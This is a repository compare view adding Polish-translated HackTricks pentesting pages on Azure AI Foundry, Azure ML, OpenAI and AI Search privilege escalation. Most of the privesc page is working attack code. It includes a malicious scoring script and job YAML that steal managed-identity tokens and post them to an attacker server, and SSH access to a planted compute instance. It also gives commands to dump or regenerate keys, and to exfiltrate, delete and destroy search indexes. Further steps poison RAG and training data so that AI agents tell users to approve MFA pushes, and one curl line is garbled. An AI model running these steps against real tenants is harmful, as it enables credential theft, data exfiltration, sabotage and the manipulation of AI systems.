gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-05 20:40:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: gitea-mirror:f437d485ad678826a3b61c422008c394afc5560d
Branches Tags
gitea-mirror:master gitea-mirror:update_PromptPwnd__Prompt_Injection_Vulnerabilities_in_Gi_20251205_014747 gitea-mirror:sr gitea-mirror:hi gitea-mirror:ja gitea-mirror:af gitea-mirror:tr gitea-mirror:sw gitea-mirror:de gitea-mirror:el gitea-mirror:ko gitea-mirror:uk gitea-mirror:fr gitea-mirror:pl gitea-mirror:es gitea-mirror:it gitea-mirror:pt gitea-mirror:zh gitea-mirror:main
gitea-mirror:searchindex-ja gitea-mirror:searchindex-en gitea-mirror:searchindex-sw gitea-mirror:searchindex-uk gitea-mirror:searchindex-pt gitea-mirror:searchindex-pl gitea-mirror:searchindex-el gitea-mirror:searchindex-de gitea-mirror:searchindex-it gitea-mirror:searchindex-hi gitea-mirror:searchindex-zh gitea-mirror:searchindex-af gitea-mirror:searchindex-tr gitea-mirror:searchindex-es gitea-mirror:searchindex-sr gitea-mirror:searchindex-ko gitea-mirror:searchindex-fr
...
compare: gitea-mirror:2fa906abcd1356b84e0af0077b6b648e0d6786c2
Branches Tags
gitea-mirror:update_PromptPwnd__Prompt_Injection_Vulnerabilities_in_Gi_20251205_014747 gitea-mirror:sr gitea-mirror:hi gitea-mirror:ja gitea-mirror:af gitea-mirror:tr gitea-mirror:sw gitea-mirror:de gitea-mirror:el gitea-mirror:ko gitea-mirror:uk gitea-mirror:fr gitea-mirror:pl gitea-mirror:es gitea-mirror:it gitea-mirror:pt gitea-mirror:zh gitea-mirror:master gitea-mirror:main
gitea-mirror:searchindex-ja gitea-mirror:searchindex-en gitea-mirror:searchindex-sw gitea-mirror:searchindex-uk gitea-mirror:searchindex-pt gitea-mirror:searchindex-pl gitea-mirror:searchindex-el gitea-mirror:searchindex-de gitea-mirror:searchindex-it gitea-mirror:searchindex-hi gitea-mirror:searchindex-zh gitea-mirror:searchindex-af gitea-mirror:searchindex-tr gitea-mirror:searchindex-es gitea-mirror:searchindex-sr gitea-mirror:searchindex-ko gitea-mirror:searchindex-fr

2 Commits
f437d485ad ... 2fa906abcd

Author SHA1 Message Date
Translator
2fa906abcd Sync SUMMARY.md with master 2025-12-04 10:37:53 +00:00
Translator
626b845aa4 Translated ['src/pentesting-cloud/azure-security/az-services/az-ai-found 2025-12-04 10:37:52 +00:00
3 changed files with 754 additions and 0 deletions
Expand all files Collapse all files

2
src/SUMMARY.md
View File

@@ -464,6 +464,7 @@
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
- [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
- [Az - AI Foundry](pentesting-cloud/azure-security/az-services/az-ai-foundry.md)
- [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
- [Az - Container Instances, Apps & Jobs](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md)
@@ -523,6 +524,7 @@
- [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
- [Az - AI Foundry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md)
- [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
- [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)

604
src/pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md Normal file
View File

@@ -0,0 +1,604 @@
# Az - AI Foundry, AI Hubs, Azure OpenAI & AI Search Privesc
{{#include ../../../banners/hacktricks-training.md}}
Azure AI Foundry łączy AI Hubs, AI Projects (Azure ML workspaces), Azure OpenAI i Azure AI Search. Atakujący, którzy uzyskają ograniczone prawa do któregokolwiek z tych zasobów, często mogą pivotować do managed identities, API keys lub downstream data stores, które dają szerszy dostęp w całym tenant. Ta strona podsumowuje wpływowe zestawy uprawnień i sposoby nadużycia ich do privilege escalation lub kradzieży danych.
## `Microsoft.MachineLearningServices/workspaces/hubs/write`, `Microsoft.MachineLearningServices/workspaces/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Z tymi uprawnieniami możesz podpiąć potężny user-assigned managed identity (UAMI) do AI Hub lub workspace. Po przypięciu, dowolne wykonanie kodu w kontekście tego workspace (endpoints, jobs, compute instances) może żądać tokenów dla UAMI, efektywnie dziedzicząc jego uprawnienia.
**Uwaga:** The `userAssignedIdentities/assign/action` permission must be granted on the UAMI resource itself (or at a scope that includes it, like the resource group or subscription).
### Enumeracja
Najpierw wylicz istniejące hubs/projects, aby wiedzieć, które resource IDs możesz zmodyfikować:
```bash
az ml workspace list --resource-group <RG> -o table
```
Zidentyfikuj istniejący UAMI, który już ma role o wysokiej wartości (np. Subscription Contributor):
```bash
az identity list --query "[].{name:name, principalId:principalId, clientId:clientId, rg:resourceGroup}" -o table
```
Sprawdź bieżącą konfigurację tożsamości workspace lub hub:
```bash
az ml workspace show --name <WS> --resource-group <RG> --query identity -o json
```
### Exploitation
**Podłącz UAMI do hub lub workspace** za pomocą REST API. Zarówno hubs, jak i workspaces używają tego samego ARM endpoint:
```bash
# Attach UAMI to an AI Hub
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<HUB>?api-version=2024-04-01" \
--body '{
"identity": {
"type": "SystemAssigned,UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<UAMI>": {}
}
}
}'
# Attach UAMI to a workspace/project
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>?api-version=2024-04-01" \
--body '{
"identity": {
"type": "SystemAssigned,UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<UAMI>": {}
}
}
}'
```
Gdy UAMI zostanie dołączony, eskalacja uprawnień wymaga **drugiego kroku** polegającego na uruchomieniu kodu, który może żądać tokenów dla UAMI. Istnieją trzy główne opcje:
### Option 1: Online Endpoints (requires `onlineEndpoints/write` + `deployments/write`)
Utwórz endpoint, który jawnie używa UAMI i wdroż złośliwy scoring script, aby ukraść jego token. Zobacz fattack wymagający `onlineEndpoints/write` i `deployments/write`.
### Option 2: ML Jobs (requires `jobs/write`)
Utwórz command job, który uruchamia dowolny kod i exfiltrates token UAMI. Szczegóły w sekcji ataku `jobs/write` poniżej.
### Option 3: Compute Instances (requires `computes/write`)
Utwórz compute instance z setup script, który uruchamia się przy starcie. Skrypt może steal tokens i ustanowić persistence. Szczegóły w sekcji ataku `computes/write` poniżej.
## `Microsoft.MachineLearningServices/workspaces/onlineEndpoints/write`, `Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments/write`, `Microsoft.MachineLearningServices/workspaces/read`
Dzięki tym uprawnieniom możesz tworzyć online endpoints i deployments, które uruchamiają dowolny kod w kontekście workspace. Jeśli workspace ma system-assigned lub user-assigned managed identity z rolami na storage accounts, Key Vaults, Azure OpenAI lub AI Search, przechwycenie tokenu managed identity daje te prawa.
Dodatkowo, aby pobrać poświadczenia endpointu i wywołać endpoint, potrzebujesz:
- `Microsoft.MachineLearningServices/workspaces/onlineEndpoints/read` - aby uzyskać szczegóły endpointu i klucze API
- `Microsoft.MachineLearningServices/workspaces/onlineEndpoints/score/action` - aby wywołać scoring endpoint (alternatywnie możesz wywołać endpoint bezpośrednio przy użyciu klucza API)
### Enumeration
Wyszukaj istniejące workspaces/projects, aby zidentyfikować cele:
```bash
az ml workspace list --resource-group <RG> -o table
```
### Eksploatacja
1. **Utwórz złośliwy skrypt scoringowy** który wykonuje dowolne polecenia. Utwórz strukturę katalogów z plikiem `score.py`:
```bash
mkdir -p ./backdoor_code
```
```python
# ./backdoor_code/score.py
import os
import json
import subprocess
def init():
pass
def run(raw_data):
results = {}
# Azure ML Online Endpoints use a custom MSI endpoint, not the standard IMDS
# Get MSI endpoint and secret from environment variables
msi_endpoint = os.environ.get("MSI_ENDPOINT", "")
identity_header = os.environ.get("IDENTITY_HEADER", "")
# Request ARM token using the custom MSI endpoint
try:
token_url = f"{msi_endpoint}?api-version=2019-08-01&resource=https://management.azure.com/"
result = subprocess.run([
"curl", "-s",
"-H", f"X-IDENTITY-HEADER: {identity_header}",
token_url
], capture_output=True, text=True, timeout=15)
results["arm_token"] = result.stdout
# Exfiltrate the ARM token to attacker server
subprocess.run([
"curl", "-s", "-X", "POST",
"-H", "Content-Type: application/json",
"-d", result.stdout,
"https://<ATTACKER-SERVER>/arm_token"
], timeout=10)
except Exception as e:
results["arm_error"] = str(e)
# Also get storage token
try:
storage_url = f"{msi_endpoint}?api-version=2019-08-01&resource=https://storage.azure.com/"
result = subprocess.run([
"curl", "-s",
"-H", f"X-IDENTITY-HEADER: {identity_header}",
storage_url
], capture_output=True, text=True, timeout=15)
results["storage_token"] = result.stdout
# Exfiltrate the storage token
subprocess.run([
"curl", "-s", "-X", "POST",
"-H", "Content-Type: application/json",
"-d", result.stdout,
"https://<ATTACKER-SERVER>/storage_token"
], timeout=10)
except Exception as e:
results["storage_error"] = str(e)
return json.dumps(results, indent=2)
```
**Ważne:** Azure ML Online Endpoints nie korzystają ze standardowego IMDS pod adresem `169.254.169.254`. Zamiast tego udostępniają:
- zmienną środowiskową `MSI_ENDPOINT` (np. `http://10.0.0.4:8911/v1/token/msi/xds`)
- zmienną środowiskową `IDENTITY_HEADER` / `MSI_SECRET` do uwierzytelniania
Użyj nagłówka `X-IDENTITY-HEADER` podczas wywoływania niestandardowego MSI endpointu.
2. **Utwórz konfigurację endpointu w YAML**:
```yaml
# endpoint.yaml
$schema: https://azuremlschemas.azureedge.net/latest/managedOnlineEndpoint.schema.json
name: <ENDPOINT-NAME>
auth_mode: key
```
3. **Utwórz konfigurację YAML wdrożenia**. Najpierw znajdź prawidłową wersję środowiska:
```bash
# List available environments
az ml environment show --name sklearn-1.5 --registry-name azureml --label latest -o json | jq -r '.id'
```
```yaml
# deployment.yaml
$schema: https://azuremlschemas.azureedge.net/latest/managedOnlineDeployment.schema.json
name: <DEPLOYMENT-NAME>
endpoint_name: <ENDPOINT-NAME>
model:
path: ./backdoor_code
code_configuration:
code: ./backdoor_code
scoring_script: score.py
environment: azureml://registries/azureml/environments/sklearn-1.5/versions/35
instance_type: Standard_DS2_v2
instance_count: 1
```
4. **Wdróż punkt końcowy i wdrożenie**:
```bash
# Create the endpoint
az ml online-endpoint create --file endpoint.yaml --resource-group <RG> --workspace-name <WS>
# Create the deployment with all traffic routed to it
az ml online-deployment create --file deployment.yaml --resource-group <RG> --workspace-name <WS> --all-traffic
```
5. **Pobierz credentials i wywołaj endpoint** to trigger code execution:
```bash
# Get the scoring URI and API key
az ml online-endpoint show --name <ENDPOINT-NAME> --resource-group <RG> --workspace-name <WS> --query "scoring_uri" -o tsv
az ml online-endpoint get-credentials --name <ENDPOINT-NAME> --resource-group <RG> --workspace-name <WS>
# Invoke the endpoint to trigger the malicious code
curl -X POST "https://<ENDPOINT-NAME>.<REGION>.inference.ml.azure.com/score" \
-H "Authorization: Bearer <API-KEY>" \
-H "Content-Type: application/json" \
-d '{"data": "test"}'
```
Funkcja `run()` wykonuje się przy każdym żądaniu i może exfiltrate managed identity tokens dla ARM, Storage, Key Vault lub innych zasobów Azure. Ukradzione tokeny mogą być następnie użyte do uzyskania dostępu do dowolnych zasobów, do których tożsamość endpointu ma uprawnienia.
## `Microsoft.MachineLearningServices/workspaces/jobs/write`, `Microsoft.MachineLearningServices/workspaces/experiments/runs/submit/action`, `Microsoft.MachineLearningServices/workspaces/experiments/runs`
Tworzenie command lub pipeline jobs pozwala uruchomić dowolny kod w kontekście workspace. Gdy tożsamość workspace ma role na storage accounts, Key Vaults, Azure OpenAI lub AI Search, przechwycenie tokena managed identity przyznaje te prawa. Podczas testowania tego PoC na `delemete-ai-hub-project` potwierdziliśmy, że wymagany jest następujący minimalny zestaw uprawnień:
- `jobs/write` pozwala utworzyć zasób job.
- `experiments/runs/submit/action` umożliwia patchowanie rekordu run i faktyczne zaplanowanie wykonania (bez tego Azure ML zwraca HTTP 403 z `run-history`).
- `experiments/runs` opcjonalne, ale pozwala na strumieniowanie logów / sprawdzanie statusu.
Użycie przygotowanego środowiska (np. `azureml://registries/azureml/environments/sklearn-1.5/versions/35`) eliminuje potrzebę `.../environments/versions/write`, a celowanie w istniejący compute (zarządzany przez obrońców) eliminuje wymagania `computes/write`.
### Enumeracja
```bash
az ml job list --workspace-name <WS> --resource-group <RG> -o table
az ml compute list --workspace-name <WS> --resource-group <RG>
```
### Eksploatacja
Utwórz złośliwy job YAML, który exfiltrates the managed identity token albo po prostu udowadnia wykonanie kodu przez beaconing do attacker endpoint:
```yaml
# job-http-callback.yaml
$schema: https://azuremlschemas.azureedge.net/latest/commandJob.schema.json
name: <UNIQUE-JOB-NAME>
display_name: token-exfil-job
experiment_name: privesc-test
compute: azureml:<COMPUTE-NAME>
command: |
echo "=== Exfiltrating tokens ==="
TOKEN=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/")
curl -s -X POST -H "Content-Type: application/json" -d "$TOKEN" "https://<ATTACKER-SERVER>/job_token"
environment: azureml://registries/azureml/environments/sklearn-1.5/versions/35
identity:
type: managed
```
Wyślij zadanie:
```bash
az ml job create \
--file job-http-callback.yaml \
--resource-group <RG> \
--workspace-name <WS> \
--stream
```
Aby określić UAMI dla zadania (jeśli jest przypisany do workspace):
```yaml
identity:
type: user_assigned
user_assigned_identities:
- /subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<UAMI>
```
Tokeny pobrane z zadań można użyć do uzyskania dostępu do dowolnych zasobów Azure, do których managed identity ma uprawnienia.
## `Microsoft.MachineLearningServices/workspaces/computes/write`
Compute instances to maszyny wirtualne zapewniające interaktywne środowiska deweloperskie (Jupyter, VS Code, Terminal) w Azure ML workspaces. Dysponując uprawnieniem `computes/write`, atakujący może utworzyć Compute instance, do której następnie uzyska dostęp, by uruchamiać dowolny kod i wykradać managed identity tokens.
### Enumeracja
```bash
az ml compute list --workspace-name <WS> --resource-group <RG> -o table
```
### Eksploatacja (zweryfikowano 20251202 w `delemete-ai-hub-project`)
1. **Wygeneruj parę kluczy SSH kontrolowaną przez atakującego.**
```bash
ssh-keygen -t rsa -b 2048 -f attacker-ci-key -N ""
```
2. **Utwórz definicję compute, która umożliwia publiczny dostęp SSH i wstrzykuje klucz.** Przynajmniej:
```yaml
# compute-instance-privesc.yaml
$schema: https://azuremlschemas.azureedge.net/latest/computeInstance.schema.json
name: attacker-ci-ngrok3
type: computeinstance
size: Standard_DS1_v2
ssh_public_access_enabled: true
ssh_settings:
ssh_key_value: "ssh-rsa AAAA... attacker@machine"
```
3. **Utwórz instancję w workspace ofiary używając tylko `computes/write`:**
```bash
az ml compute create \
--file compute-instance-privesc.yaml \
--resource-group <RG> \
--workspace-name <WS>
```
Azure ML natychmiast wdraża VM i ujawnia per-instance endpoints (np. `https://attacker-ci-ngrok3.<region>.instances.azureml.ms/`) oraz nasłuch SSH na porcie `50000`, którego nazwa użytkownika domyślnie to `azureuser`.
4. **SSH na instancję i uruchom dowolne polecenia:**
```bash
ssh -p 50000 \
-o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-i ./attacker-ci-key \
azureuser@<PUBLIC-IP> \
"curl -s https://<ATTACKER-SERVER>/beacon"
```
Nasz test na żywo wysłał ruch z instancji obliczeniowej do `https://d63cfcfa4b44.ngrok-free.app`, potwierdzając pełne RCE.
5. **Steal managed identity tokens from IMDS and optionally exfiltrate them.** Instancja może wywołać IMDS bez dodatkowych uprawnień:
```bash
# Run inside the compute instance
ARM_TOKEN=$(curl -s -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/")
echo "$ARM_TOKEN" | jq
# Send the token to attacker infrastructure
curl -s -X POST -H "Content-Type: application/json" \
-d "$ARM_TOKEN" \
https://<ATTACKER-SERVER>/compute_token
```
Jeśli workspace ma dołączone user-assigned managed identity, przekaż jego client ID do IMDS, aby wygenerować token tej tożsamości:
```bash
curl -s -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/&client_id=<UAMI-CLIENT-ID>"
```
**Uwagi:**
- Skrypty instalacyjne (`setup_scripts.creation_script.path`) mogą zautomatyzować persistence/beaconing, ale nawet podstawowy workflow SSH powyżej wystarczył, by skompromitować tokens.
- Public SSH jest opcjonalny — atakujący mogą też pivotować przez Azure ML portal/Jupyter endpoints, jeśli mają interaktywny dostęp. Public SSH po prostu daje deterministyczną ścieżkę, którą obrońcy rzadko monitorują.
## `Microsoft.MachineLearningServices/workspaces/connections/listsecrets/action`, `Microsoft.MachineLearningServices/workspaces/datastores/listSecrets/action`
Te uprawnienia pozwalają odzyskać przechowywane secrets dla outbound connectors, jeśli którakolwiek z nich jest skonfigurowana. Najpierw wyenumeruj obiekty, aby wiedzieć, które wartości `name` będą celem:
```bash
#
az ml connection list --workspace-name <WS> --resource-group <RG> --populate-secrets -o table
az ml datastore list --workspace-name <WS> --resource-group <RG>
```
- **Azure OpenAI connections** ujawniają admin key i endpoint URL, pozwalając na bezpośrednie wywołanie GPT deployments lub redeploy z nowymi ustawieniami.
- **Azure AI Search connections** leak Search admin keys, które mogą modyfikować lub usuwać indexes i datasources, zatruwając RAG pipeline.
- **Generic connections/datastores** często zawierają SAS tokens, service principal secrets, GitHub PATs lub Hugging Face tokens.
```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections/<CONNECTION>/listSecrets?api-version=2024-04-01"
```
## `Microsoft.CognitiveServices/accounts/listKeys/action` | `Microsoft.CognitiveServices/accounts/regenerateKey/action`
Posiadanie nawet jednej z tych uprawnień do zasobu Azure OpenAI zapewnia natychmiastowe możliwości eskalacji. Aby znaleźć kandydatów na zasoby:
```bash
az resource list --resource-type Microsoft.CognitiveServices/accounts \
--query "[?kind=='OpenAI'].{name:name, rg:resourceGroup, location:location}" -o table
az cognitiveservices account list --resource-group <RG> \
--query "[?kind=='OpenAI'].{name:name, location:location}" -o table
```
1. Wyodrębnij bieżące API keys i wywołaj OpenAI REST API, aby odczytać fine-tuned models lub nadużyć quota w celu eksfiltracji danych przez prompt injection.
2. Rotate/regenerate keys, aby pozbawić obrońców dostępu do usługi lub zapewnić, że tylko atakujący zna nowy key.
```bash
az cognitiveservices account keys list --name <AOAI> --resource-group <RG>
az cognitiveservices account keys regenerate --name <AOAI> --resource-group <RG> --key-name key1
```
Gdy masz klucze, możesz bezpośrednio wywoływać OpenAI REST endpoints:
```bash
curl "https://<name>.openai.azure.com/openai/v1/models" \
-H "api-key: <API-KEY>"
curl 'https://<name>.openai.azure.com/openai/v1/chat/completions' \
-H "Content-Type: application/json" \
-H "api-key: <API-KEY>" \
-d '{
"model": "gpt-4.1",
"messages": [
{"role": "user", "content": "Hello!"}
]
}'
```
Ponieważ wdrożenia OpenAI są często odwoływane wewnątrz przepływów promptów lub Logic Apps, posiadanie klucza administratora pozwala na odtworzenie historycznych promptów/odpowiedzi poprzez ponowne użycie tej samej nazwy wdrożenia poza Azure AI Foundry.
## `Microsoft.Search/searchServices/listAdminKeys/action` | `Microsoft.Search/searchServices/regenerateAdminKey/action`
Najpierw wylistuj search AI services i ich lokalizacje, aby następnie pobrać klucze administratora tych usług:
```bash
az search service list --resource-group <RG>
az search service show --name <SEARCH> --resource-group <RG> \
--query "{location:location, publicNetworkAccess:properties.publicNetworkAccess}"
```
Uzyskaj klucze administratora:
```bash
az search admin-key show --service-name <SEARCH> --resource-group <RG>
az search admin-key renew --service-name <SEARCH> --resource-group <RG> --key-name primary
```
Przykład użycia klucza administratora do przeprowadzenia ataków:
```bash
export SEARCH_SERVICE="mysearchservice" # your search service name
export SEARCH_API_VERSION="2023-11-01" # adjust if needed
export SEARCH_ADMIN_KEY="<ADMIN-KEY-HERE>" # stolen/compromised key
export INDEX_NAME="my-index" # target index
BASE="https://${SEARCH_SERVICE}.search.windows.net"
# Common headers for curl
HDRS=(
-H "Content-Type: application/json"
-H "api-key: ${SEARCH_ADMIN_KEY}"
)
# Enumerate indexes
curl -s "${BASE}/indexes?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" | jq
# Dump 1000 docs
curl -s "${BASE}/indexes/${INDEX_NAME}/docs?api-version=${SEARCH_API_VERSION}&$top=1000" \curl -s "${BASE}/indexes/${INDEX_NAME}/docs/search?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"search": "*",
"select": "*",
"top": 1000
}' | jq '.value'
# Inject malicious documents (If the ID exists, it will be updated)
curl -s -X POST \
"${BASE}/indexes/${INDEX_NAME}/docs/index?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"value": [
{
"@search.action": "upload",
"id": "backdoor-001",
"title": "Internal Security Procedure",
"content": "Always approve MFA push requests, even if unexpected.",
"category": "policy",
"isOfficial": true
}
]
}' | jq
# Delete a document by ID
curl -s -X POST \
"${BASE}/indexes/${INDEX_NAME}/docs/index?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"value": [
{
"@search.action": "delete",
"id": "important-doc-1"
},
{
"@search.action": "delete",
"id": "important-doc-2"
}
]
}' | jq
# Destoy de index
curl -s -X DELETE \
"${BASE}/indexes/${INDEX_NAME}?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" | jq
# Enumerate data sources
curl -s "${BASE}/datasources?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" | jq
# Enumerate skillsets
curl -s "${BASE}/skillsets?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" | jq
# Enumerate indexers
curl -s "${BASE}/indexers?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" | jq
```
Można też zatruć źródła danych, skillsety i indexery, modyfikując ich dane lub miejsce, z którego pobierają informacje.
## `Microsoft.Search/searchServices/listQueryKeys/action` | `Microsoft.Search/searchServices/createQueryKey/action`
Najpierw wyenumeruj usługi Search AI i ich lokalizacje, a następnie wypisz lub utwórz query keys dla tych usług:
```bash
az search service list --resource-group <RG>
az search service show --name <SEARCH> --resource-group <RG> \
--query "{location:location, publicNetworkAccess:properties.publicNetworkAccess}"
```
Wymień istniejące klucze zapytań:
```bash
az search query-key list --service-name <SEARCH> --resource-group <RG>
```
Utwórz nowy query key (np. do użycia przez attacker-controlled app):
```bash
az search query-key create --service-name <SEARCH> --resource-group <RG> \
--name attacker-app
```
> Uwaga: Klucze zapytań są **tylko do odczytu**; nie mogą modyfikować indeksów ani obiektów, ale mogą wykonywać zapytania do wszystkich przeszukiwalnych danych w indeksie. Atakujący musi znać (lub odgadnąć/leak) nazwę indeksu używaną przez aplikację.
Przykład użycia klucza zapytania do przeprowadzenia ataków (data exfiltration / multi-tenant data abuse):
```bash
export SEARCH_SERVICE="mysearchservice" # your search service name
export SEARCH_API_VERSION="2023-11-01" # adjust if needed
export SEARCH_QUERY_KEY="<QUERY-KEY-HERE>" # stolen/abused query key
export INDEX_NAME="my-index" # target index (from app config, code, or guessing)
BASE="https://${SEARCH_SERVICE}.search.windows.net"
# Common headers for curl
HDRS=(
-H "Content-Type: application/json"
-H "api-key: ${SEARCH_QUERY_KEY}"
)
##############################
# 1) Dump documents (exfil)
##############################
# Dump 1000 docs (search all, full projection)
curl -s "${BASE}/indexes/${INDEX_NAME}/docs/search?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"search": "*",
"select": "*",
"top": 1000
}' | jq '.value'
# Naive pagination example (adjust top/skip for more data)
curl -s "${BASE}/indexes/${INDEX_NAME}/docs/search?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"search": "*",
"select": "*",
"top": 1000,
"skip": 1000
}' | jq '.value'
##############################
# 2) Targeted extraction
##############################
# Abuse weak tenant filters extract all docs for a given tenantId
curl -s "${BASE}/indexes/${INDEX_NAME}/docs/search?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"search": "*",
"filter": "tenantId eq '\''victim-tenant'\''",
"select": "*",
"top": 1000
}' | jq '.value'
# Extract only "sensitive" or "internal" documents by category/tag
curl -s "${BASE}/indexes/${INDEX_NAME}/docs/search?api-version=${SEARCH_API_VERSION}" \
"${HDRS[@]}" \
-d '{
"search": "*",
"filter": "category eq '\''internal'\'' or sensitivity eq '\''high'\''",
"select": "*",
"top": 1000
}' | jq '.value'
```
Z samymi `listQueryKeys` / `createQueryKey` atakujący nie może modyfikować indeksów, dokumentów ani indexerów, ale może:
- Ukradać wszystkie przeszukiwalne dane z udostępnionych indeksów (pełna eksfiltracja danych).
- Nadużywać filtrów zapytań do ekstrakcji danych dla konkretnych tenantów lub tagów.
- Wykorzystać query key z aplikacji wystawionych do internetu (w połączeniu z włączonym `publicNetworkAccess`), aby nieustannie wyprowadzać dane spoza wewnętrznej sieci.
## `Microsoft.MachineLearningServices/workspaces/data/write`, `Microsoft.MachineLearningServices/workspaces/data/delete`, `Microsoft.Storage/storageAccounts/blobServices/containers/write`, `Microsoft.MachineLearningServices/workspaces/data/versions/write`, `Microsoft.MachineLearningServices/workspaces/datasets/registered/write`
Kontrola nad assetami danych lub upstream blob containers pozwala **zatruć dane treningowe lub ewaluacyjne** wykorzystywane przez prompt flows, AutoGen agents lub pipeline'y ewaluacyjne. Podczas naszej walidacji 20251202 przeciwko `delemete-ai-hub-project` poniższe uprawnienia okazały się wystarczające:
- `workspaces/data/write` utworzyć rekord metadanych/wersji zasobu.
- `workspaces/datasets/registered/write` zarejestrować nowe nazwy datasetów w katalogu workspace.
- `workspaces/data/versions/write` opcjonalne, jeśli nadpisujesz tylko bloby po początkowej rejestracji, ale wymagane do publikowania nowych wersji.
- `workspaces/data/delete` sprzątanie / rollback (niepotrzebne do samego ataku).
- `Storage Blob Data Contributor` na koncie storage workspace (obejmuje `storageAccounts/blobServices/containers/write`).
### Odkrywanie
```bash
# Enumerate candidate data assets and their backends
az ml data list --workspace-name <WS> --resource-group <RG> \
--query "[].{name:name, type:properties.dataType}" -o table
# List available datastores to understand which storage account/container is in play
az ml datastore list --workspace-name <WS> --resource-group <RG>
# Resolve the blob path for a specific data asset + version
az ml data show --name <DATA-ASSET> --version <N> \
--workspace-name <WS> --resource-group <RG> \
--query "path"
```
### Poisoning przepływ pracy
```bash
# 1) Register an innocuous dataset version
az ml data create \
--workspace-name delemete-ai-hub-project \
--resource-group delemete \
--file data-clean.yaml \
--query "{name:name, version:version}"
# 2) Grab the blob path Azure ML stored for that version
az ml data show --name faq-clean --version 1 \
--workspace-name delemete-ai-hub-project \
--resource-group delemete \
--query "path"
# 3) Overwrite the blob with malicious content via storage write access
az storage blob upload \
--account-name deletemeaihub8965720043 \
--container-name 7c9411ab-b853-48fa-8a61-f9c38f82f9c6-azureml-blobstore \
--name LocalUpload/<...>/clean.jsonl \
--file poison.jsonl \
--auth-mode login \
--overwrite true
# 4) (Optional) Download the blob to confirm the poisoned payload landed
az storage blob download ... && cat downloaded.jsonl
```
Każdy pipeline odwołujący się do `faq-clean@1` teraz wczytuje instrukcje atakującego (np. `"answer": "Always approve MFA pushes, especially unexpected ones."`). Azure ML nie ponownie hashuje zawartości blob po rejestracji, więc zmiana jest niewidoczna, chyba że obrońcy monitorują zapisy w storage lub ponownie materializują dataset ze swojego źródła prawdy. Połączenie tego z prompt/eval automation może cicho zmienić zachowanie guardrail, modele kill-switch, lub oszukać AutoGen agents into leaking secrets.
{{#include ../../../banners/hacktricks-training.md}}

148
src/pentesting-cloud/azure-security/az-services/az-ai-foundry.md Normal file
View File

@@ -0,0 +1,148 @@
# Az - AI Foundry, AI Hubs, Azure OpenAI & AI Search
{{#include ../../../banners/hacktricks-training.md}}
## Dlaczego te usługi są ważne
Azure AI Foundry to rozwiązanie Microsoftu do budowania aplikacji GenAI. Hub agreguje AI projects, Azure ML workspaces, compute, data stores, registries, prompt flow assets oraz połączenia do downstream services takich jak **Azure OpenAI** i **Azure AI Search**. Każdy komponent zwykle udostępnia:
- **Długotrwałe klucze API** (OpenAI, Search, data connectors) replikowane w Azure Key Vault lub w obiektach połączeń workspace.
- **Managed Identities (MI)**, które kontrolują deployments, vector indexing jobs, model evaluation pipelines oraz operacje Git/GitHub Enterprise.
- **Cross-service links** (storage accounts, container registries, Application Insights, Log Analytics), które dziedziczą uprawnienia hub/project.
- **Multi-tenant connectors** (Hugging Face, Azure Data Lake, Event Hubs), które mogą leak upstream credentials or tokens.
